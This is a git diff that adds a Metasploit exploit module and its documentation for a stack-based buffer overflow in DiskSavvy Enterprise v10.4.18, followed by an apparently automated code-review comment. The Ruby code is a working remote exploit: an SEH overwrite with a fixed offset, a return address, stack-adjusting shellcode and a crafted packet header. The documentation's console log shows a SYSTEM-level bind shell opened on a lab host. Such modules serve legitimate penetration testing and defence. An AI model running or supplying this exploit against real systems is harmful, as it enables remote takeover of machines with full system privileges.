diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
new file mode 100644
index 0000000000..056f7bdd15
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md
@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
+
+## Verification Steps
+ 1. Install a vulnerable DiskSavvy Enterprise
+ 2. Start `msfconsole`
+ 3. Do `use exploit/windows/misc/disk_savvy_adm`
+ 4. Do `set RHOST ip`
+ 5. Do `set PAYLOAD windows/shell/bind_tcp`
+ 6. Do `exploit`
+ 7. Enjoy your shell
+
+## Scenarios
+
+### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/disk_savvy_adm
+msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
+RHOST => 192.168.216.55
+msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
+payload => windows/shell/bind_tcp
+msf exploit(windows/misc/disk_savvy_adm) > exploit
+
+[*] Started bind handler
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.216.55
+[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+C:\Windows\system32>whoami
+whoami
+nt authority\system
+
+C:\Windows\system32>
+```
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb
new file mode 100644
index 0000000000..de4da979a3
--- /dev/null
+++ b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Disk Savvy Enterprise v10.4.18',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in Disk Savvy Enterprise v10.4.18, caused by improper bounds
+ checking of the request sent to the built-in server. This module
+ has been tested successfully on Windows 7 SP1 x86.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Daniel Teixeira'
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x02\x0a\x0d\xf8",
+ 'Space' => 800
+ },
+ 'Targets' =>
+ [
+ [ 'Disk Savvy Enterprise v10.4.18',
+ {
+ 'Offset' => 124,
+ 'Ret' => 0x10056d13
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jan 31 2017',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(9124)])
+
+ end
+
+ def exploit
+ seh = generate_seh_record(target.ret)
+ connect
+
+ buffer = make_nops(target['Offset'])
+ buffer << seh
+ buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh
+ buffer << "\x83\xc4\x21" #ADD esp,21h
+ buffer << "\xff\xe4" #JMP esp
+ buffer << payload.encoded
+ buffer << Rex::Text.rand_text_alphanumeric(1)
+
+ header = "\x75\x19\xba\xab"
+ header << "\x03\x00\x00\x00"
+ header << "\x00\x40\x00\x00"
+ header << [buffer.length].pack("V")
+ header << [buffer.length].pack("V")
+ header << [buffer[-1].ord].pack("V")
+ packet = header
+ packet << buffer
+
+ sock.put(packet)
+ handler
+ end
+end
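Review bot: `exploit` opens the connection with `connect` but never calls `disconnect`, so the socket to RPORT is left open after `sock.put(packet)` until the module instance is torn down; add `disconnect` after `handler`, as other SEH modules in the framework commonly do. The info hash also carries no `'References'` entry, so nothing backs `'DisclosureDate' => 'Jan 31 2017'` or lets a reader find the public advisory — add a `'References' => [ [ 'URL', '<advisory-url-placeholder>' ] ]` pair pointing at the source of that date. `'Ret' => 0x10056d13` is a bare address; a short comment naming the binary and version it was taken from is what the next person updating the target list will need. Finally, the stray blank line between `register_options([Opt::RPORT(9124)])` and `end` in `initialize` is a style nit RuboCop would flag.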